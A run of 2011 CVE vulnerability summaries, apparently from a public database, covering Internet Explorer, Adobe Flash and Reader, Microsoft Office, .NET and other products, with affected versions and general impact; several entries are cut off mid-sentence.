[CVE-2011-2382] Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue. [CVE-2011-2300] Unspecified vulnerability in Oracle VM VirtualBox 4.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Guest Additions for Windows. [CVE-2011-2143] IBM Datacap Taskmaster Capture 8.0.1 before FP1, when Windows Authentication is enabled, allows remote attackers to obtain login access by using an incorrect password in conjunction with an account name from a different domain. [CVE-2011-2140] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425. [CVE-2011-2139] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers bypass the Same Origin Policy and obtain sensitive information via unspecified vectors. [CVE-2011-2138] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2416. [CVE-2011-2137] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2136] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2138 and CVE-2011-2416. [CVE-2011-2135] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2140, CVE-2011-2417, and CVE-2011-2425. [CVE-2011-2134] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2137, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2130] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2134, CVE-2011-2137, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2110] Adobe Flash Player before 10.3.181.26 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.23 and earlier on Android, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in June 2011. [CVE-2011-2107] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.181.22 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.22 and earlier on Android, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "universal cross-site scripting vulnerability." [CVE-2011-2105] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted font data. [CVE-2011-2104] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2103] Adobe Reader and Acrobat 8.x before 8.3 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2102] Unspecified vulnerability in Adobe Reader and Acrobat before 10.1 on Windows and Mac OS X allows attackers to bypass intended access restrictions via unknown vectors. [CVE-2011-2101] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X do not properly restrict script, which allows attackers to execute arbitrary code via a crafted document, related to a "cross document script execution vulnerability." [CVE-2011-2100] Untrusted search path vulnerability in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2011-2099] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2098. [CVE-2011-2098] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2099. [CVE-2011-2097] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2094 and CVE-2011-2095. [CVE-2011-2096] Heap-based buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2095] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2094 and CVE-2011-2097. [CVE-2011-2094] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2095 and CVE-2011-2097. [CVE-2011-2075] Unspecified vulnerability in Google Chrome 11.0.696.65 on Windows 7 SP1 allows remote attackers to execute arbitrary code via unknown vectors. NOTE: as of 20110510, the only disclosure is a vague advisory that possibly relates to multiple vulnerabilities or multiple products. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2011-2041] The Start Before Logon (SBL) functionality in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.254 on Windows, and on Windows Mobile, allows local users to gain privileges via unspecified user-interface interaction, aka Bug ID CSCta40556. [CVE-2011-2039] The helper application in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.185 on Windows, and on Windows Mobile, downloads a client executable file (vpndownloader.exe) without verifying its authenticity, which allows remote attackers to execute arbitrary code via the url property to a certain ActiveX control in vpnweb.ocx, aka Bug ID CSCsy00904. [CVE-2011-2012] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 does not properly validate session cookies, which allows remote attackers to cause a denial of service (IIS outage) via unspecified network traffic, aka "Null Session Cookie Crash." [CVE-2011-2010] The Microsoft Office Input Method Editor (IME) for Simplified Chinese in Microsoft Pinyin IME 2010, Office Pinyin SimpleFast Style 2010, and Office Pinyin New Experience Style 2010 does not properly restrict access to configuration options, which allows local users to gain privileges via the Microsoft Pinyin (aka MSPY) IME toolbar, aka "Pinyin IME Elevation Vulnerability." [CVE-2011-2008] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability." [CVE-2011-2007] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Endless Loop DoS in snabase.exe Vulnerability." [CVE-2011-2001] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an attempted access to a virtual function table after corruption of this table has occurred, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability." [CVE-2011-2000] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Body Element Remote Code Execution Vulnerability." [CVE-2011-1999] Microsoft Internet Explorer 8 does not properly allocate and access memory, which allows remote attackers to execute arbitrary code via vectors involving a "dereferenced memory address," aka "Select Element Remote Code Execution Vulnerability." [CVE-2011-1998] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that was not properly initialized, aka "Jscript9.dll Remote Code Execution Vulnerability." [CVE-2011-1997] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnLoad Event Remote Code Execution Vulnerability." [CVE-2011-1996] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Option Element Remote Code Execution Vulnerability." [CVE-2011-1995] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that was not properly initialized, aka "OLEAuto32.dll Remote Code Execution Vulnerability." [CVE-2011-1993] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Scroll Event Remote Code Execution Vulnerability." [CVE-2011-1992] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to read content from a different (1) domain or (2) zone via a "trial and error" attack, aka "XSS Filter Information Disclosure Vulnerability." [CVE-2011-1990] Microsoft Excel 2007 SP2 [CVE-2011-1989] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1988] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1987] Array index error in Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1986] Use-after-free vulnerability in Microsoft Excel 2003 SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Use after Free WriteAV Vulnerability." [CVE-2011-1983] Use-after-free vulnerability in Microsoft Office 2007 SP2 and SP3, Office 2010 Gold and SP1, and Office for Mac 2011 allows remote attackers to execute arbitrary code via a crafted Word document, aka "Word Use After Free Vulnerability." [CVE-2011-1982] Microsoft Office 2007 SP2, and 2010 Gold and SP1, does not initialize an unspecified object pointer during the opening of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Office Uninitialized Object Pointer Vulnerability." [CVE-2011-1980] Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-1979] Microsoft Visio 2003 SP3 and 2007 SP2 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "Move Around the Block RCE Vulnerability." [CVE-2011-1978] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4 does not properly validate the System.Net.Sockets trust level, which allows remote attackers to obtain sensitive information or trigger arbitrary outbound network traffic via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Socket Restriction Bypass Vulnerability." [CVE-2011-1977] The ASP.NET Chart controls in Microsoft .NET Framework 4, and Chart Control for Microsoft .NET Framework 3.5 SP1, do not properly verify functions in URIs, which allows remote attackers to read arbitrary files via special characters in a URI in an HTTP request, aka "Chart Control Information Disclosure Vulnerability." [CVE-2011-1976] Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability." [CVE-2011-1972] Microsoft Visio 2003 SP3, 2007 SP2, and 2010 Gold and SP1 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "pStream Release RCE Vulnerability." [CVE-2011-1969] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 provides the MicrosoftClient.jar file containing a signed Java applet, which allows remote attackers to execute arbitrary code on client machines via unspecified vectors, aka "Poisoned Cup of Code Execution Vulnerability." [CVE-2011-1964] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Style Object Memory Corruption Vulnerability." [CVE-2011-1963] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "XSLT Memory Corruption Vulnerability." [CVE-2011-1962] Microsoft Internet Explorer 6 through 9 does not properly handle unspecified character sequences, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers "inactive filtering," aka "Shift JIS Character Encoding Vulnerability." [CVE-2011-1961] The telnet URI handler in Microsoft Internet Explorer 6 through 9 does not properly launch the handler application, which allows remote attackers to execute arbitrary programs via a crafted web site, aka "Telnet Handler Remote Code Execution Vulnerability." [CVE-2011-1960] Microsoft Internet Explorer 6 through 9 does not properly implement JavaScript event handlers, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Event Handlers Information Disclosure Vulnerability." [CVE-2011-1897] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Default Reflected XSS Vulnerability." [CVE-2011-1896] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "ExcelTable Reflected XSS Vulnerability." [CVE-2011-1895] CRLF injection vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary HTTP headers, and conduct HTTP response splitting attacks and cross-site scripting (XSS) attacks, via unspecified vectors, aka "ExcelTable Response Splitting XSS Vulnerability." [CVE-2011-1890] Cross-site scripting (XSS) vulnerability in EditForm.aspx in Microsoft Office SharePoint Server 2010 and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via a post, aka "Editform Script Injection Vulnerability." [CVE-2011-1889] The NSPLookupServiceNext function in the client in Microsoft Forefront Threat Management Gateway (TMG) 2010 allows remote attackers to execute arbitrary code via vectors involving unspecified requests, aka "TMG Firewall Client Memory Corruption Vulnerability." [CVE-2011-1847] IBM DB2 9.5 before FP7 and 9.7 before FP4 on Linux, UNIX, and Windows does not properly enforce privilege requirements for table access, which allows remote authenticated users to modify SYSSTAT.TABLES statistics columns via an UPDATE statement. NOTE: some of these details are obtained from third party information. [CVE-2011-1846] IBM DB2 9.5 before FP7 and 9.7 before FP4 on Linux, UNIX, and Windows does not properly revoke role membership from groups, which allows remote authenticated users to execute non-DDL statements by leveraging previous inherited possession of a role, a different vulnerability than CVE-2011-0757. NOTE: some of these details are obtained from third party information. [CVE-2011-1845] Multiple memory leaks in the DataGrid control implementation in Microsoft Silverlight 4 before 4.0.60310.0 allow remote attackers to cause a denial of service (memory consumption) via an application involving (1) subscriptions to an INotifyDataErrorInfo.ErrorsChanged event or (2) a TextBlock or TextBox element. [CVE-2011-1844] Memory leak in Microsoft Silverlight 4 before 4.0.60310.0 allows remote attackers to cause a denial of service (memory consumption) via an application involving a popup control and a custom DependencyProperty property, related to lack of garbage collection. [CVE-2011-1821] IBM Tivoli Directory Server (TDS) 5.2 before 5.2.0.5-TIV-ITDS-IF0010 on Windows allows remote authenticated users to cause a denial of service (daemon hang) via a cn=changelog search. [CVE-2011-1592] The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x before 1.4.5 on Windows uses an incorrect integer data type during decoding of SETCLIENTID calls, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file. [CVE-2011-1508] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, does not properly manage memory allocations for function pointers, which allows user-assisted remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Function Pointer Overwrite Vulnerability." [CVE-2011-1417] Integer overflow in QuickLook, as used in Apple Mac OS X before 10.6.7 and MobileSafari in Apple iOS before 4.2.7 and 4.3.x before 4.3.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a Microsoft Office document with a crafted size field in the OfficeArtMetafileHeader, related to OfficeArtBlip, as demonstrated on the iPhone by Charlie Miller and Dion Blazakis during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1353] Unspecified vulnerability in Adobe Reader 10.x before 10.1.1 on Windows allows local users to gain privileges via unknown vectors. [CVE-2011-1345] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, as demonstrated by Stephen Fewer as the first of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011, aka "Object Management Memory Corruption Vulnerability." [CVE-2011-1300] The Program::getActiveUniformMaxLength function in libGLESv2/Program.cpp in libGLESv2.dll in the WebGLES library in Almost Native Graphics Layer Engine (ANGLE), as used in Mozilla Firefox 4.x before 4.0.1 on Windows and in the GPU process in Google Chrome before 10.0.648.205 on Windows, allows remote attackers to execute arbitrary code via unspecified vectors, related to an "off-by-three" error. [CVE-2011-1280] The XML Editor in Microsoft InfoPath 2007 SP2 and 2010 [CVE-2011-1279] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Out of Bounds WriteAV Vulnerability." [CVE-2011-1278] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel WriteAV Vulnerability." [CVE-2011-1277] Microsoft Excel 2002 SP3, Office 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Memory Corruption Vulnerability." [CVE-2011-1276] Buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1275] Microsoft Excel 2002 SP3 [CVE-2011-1274] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1273] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-1272] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1271] The JIT compiler in Microsoft .NET Framework 3.5 Gold and SP1, 3.5.1, and 4.0, when IsJITOptimizerDisabled is false, does not properly handle expressions related to null strings, which allows context-dependent attackers to bypass intended access restrictions, and consequently execute arbitrary code, in opportunistic circumstances by leveraging a crafted application, as demonstrated by (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework JIT Optimization Vulnerability." [CVE-2011-1270] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Presentation Buffer Overrun RCE Vulnerability." [CVE-2011-1269] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1266] The Vector Markup Language (VML) implementation in vgx.dll in Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "VML Memory Corruption Vulnerability." [CVE-2011-1262] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "HTTP Redirect Memory Corruption Vulnerability." [CVE-2011-1261] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Selection Object Memory Corruption Vulnerability." [CVE-2011-1260] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Layout Memory Corruption Vulnerability." [CVE-2011-1258] Microsoft Internet Explorer 6 through 8 does not properly restrict web script, which allows user-assisted remote attackers to obtain sensitive information from a different (1) domain or (2) zone via vectors involving a drag-and-drop operation, aka "Drag and Drop Information Disclosure Vulnerability." [CVE-2011-1257] Race condition in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors involving access to an object, aka "Window Open Race Condition Vulnerability." [CVE-2011-1256] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "DOM Modification Memory Corruption Vulnerability." [CVE-2011-1255] The Timed Interactive Multimedia Extensions (aka HTML+TIME) implementation in Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability." [CVE-2011-1254] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Drag and Drop Memory Corruption Vulnerability." [CVE-2011-1253] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.0.60831, does not properly restrict inheritance, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Class Inheritance Vulnerability." [CVE-2011-1251] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "DOM Manipulation Memory Corruption Vulnerability." [CVE-2011-1250] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Link Properties Handling Memory Corruption Vulnerability." [CVE-2011-1246] Microsoft Internet Explorer 8 does not properly handle content settings in HTTP responses, which allows remote web servers to obtain sensitive information from a different (1) domain or (2) zone via a crafted response, aka "MIME Sniffing Information Disclosure Vulnerability." [CVE-2011-1245] Microsoft Internet Explorer 6 and 7 does not properly restrict script access to content from a (1) different domain or (2) different zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Javascript Information Disclosure Vulnerability." [CVE-2011-1244] Microsoft Internet Explorer 6, 7, and 8 does not enforce intended domain restrictions on content access, which allows remote attackers to obtain sensitive information or conduct clickjacking attacks via a crafted web site, aka "Frame Tag Information Disclosure Vulnerability." [CVE-2011-1223] Buffer overflow in the Alternate Data Stream (aka ADS or named stream) functionality in the backup-archive client in IBM Tivoli Storage Manager (TSM) before 5.4.3.4, 5.5.x before 5.5.3, 6.x before 6.1.4, and 6.2.x before 6.2.2 on Windows allows local users to gain privileges via unspecified vectors. [CVE-2011-1222] Buffer overflow in the Journal Based Backup (JBB) feature in the backup-archive client in IBM Tivoli Storage Manager (TSM) before 5.4.3.4, 5.5.x before 5.5.3, 6.x before 6.1.4, and 6.2.x before 6.2.2 on Windows and AIX allows local users to gain privileges via unspecified vectors. [CVE-2011-1215] Stack-based buffer overflow in mw8sr.dll in Autonomy KeyView, as used in IBM Lotus Notes before 8.5.2 FP3, allows remote attackers to execute arbitrary code via a crafted link in a Microsoft Office document attachment, aka SPR PRAD8823ND. [CVE-2011-1103] The WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to obtain sensitive information via a request to an invalid report, which reveals the installation path in an error message, as demonstrated with requests to (1) report/infection-table.html or (2) report/productsummary-table.html. [CVE-2011-1102] Cross-site scripting (XSS) vulnerability in the WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1056] The installer for Metasploit Framework 3.5.1, when running on Windows, uses weak inherited permissions for the Metasploit installation directory, which allows local users to gain privileges by replacing critical files with a Trojan horse. [CVE-2011-1003] Double free vulnerability in the vba_read_project_strings function in vba_extract.c in libclamav in ClamAV before 0.97 might allow remote attackers to execute arbitrary code via crafted Visual Basic for Applications (VBA) data in a Microsoft Office document. NOTE: some of these details are obtained from third party information. [CVE-2011-0980] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse Office Art objects, which allows remote attackers to execute arbitrary code via vectors related to a function pointer, aka "Excel Dangling Pointer Vulnerability." [CVE-2011-0979] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0978] Stack-based buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0977] Use-after-free vulnerability in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via malformed shape data in the Office drawing file format, aka "Microsoft Office Graphic Object Dereferencing Vulnerability." [CVE-2011-0976] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0890] HP Discovery & Dependency Mapping Inventory (DDMI) 7.50, 7.51, 7.60, 7.61, 7.70, and 9.30 launches the Windows SNMP service with its default configuration, which allows remote attackers to obtain potentially sensitive information or have unspecified other impact by leveraging the public read community. [CVE-2011-0866] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Java Runtime Environment. [CVE-2011-0817] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-0806] Unspecified vulnerability in the Network Foundation component in Oracle Database Server 10.1.0.5, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2011-0788] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0786. [CVE-2011-0786] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0788. [CVE-2011-0770] Cross-site scripting (XSS) vulnerability in Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 allows remote attackers to inject arbitrary web script or HTML via the Windows XP variable in a file. [CVE-2011-0757] IBM DB2 9.1 before FP10, 9.5 before FP6a, and 9.7 before FP2 on Linux, UNIX, and Windows does not properly revoke the DBADM authority, which allows remote authenticated users to execute non-DDL statements by leveraging previous possession of this authority. [CVE-2011-0754] The SplFileInfo::getType function in the Standard PHP Library (SPL) extension in PHP before 5.3.4 on Windows does not properly detect symbolic links, which might make it easier for local users to conduct symlink attacks by leveraging cross-platform differences in the stat structure, related to lack of a FILE_ATTRIBUTE_REPARSE_POINT check. [CVE-2011-0731] Buffer overflow in the DB2 Administration Server (DAS) component in IBM DB2 9.1 before FP10, 9.5 before FP7, and 9.7 before FP3 on Linux, UNIX, and Windows allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2011-0698] Directory traversal vulnerability in Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 on Windows might allow remote attackers to read or execute files via a / (slash) character in a key in a session cookie, related to session replays. [CVE-2011-0664] Microsoft .NET Framework 2.0 SP1 and SP2, 3.5 Gold and SP1, 3.5.1, and 4.0, and Silverlight 4 before 4.0.60531.0, does not properly validate arguments to unspecified networking API functions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Array Offset Vulnerability." [CVE-2011-0663] Multiple integer overflows in the Microsoft (1) JScript 5.6 through 5.8 and (2) VBScript 5.6 through 5.8 scripting engines allow remote attackers to execute arbitrary code via a crafted web page, aka "Scripting Memory Reallocation Vulnerability." [CVE-2011-0656] Microsoft PowerPoint 2002 SP3, 2003 SP3, 2007 SP2, and 2010 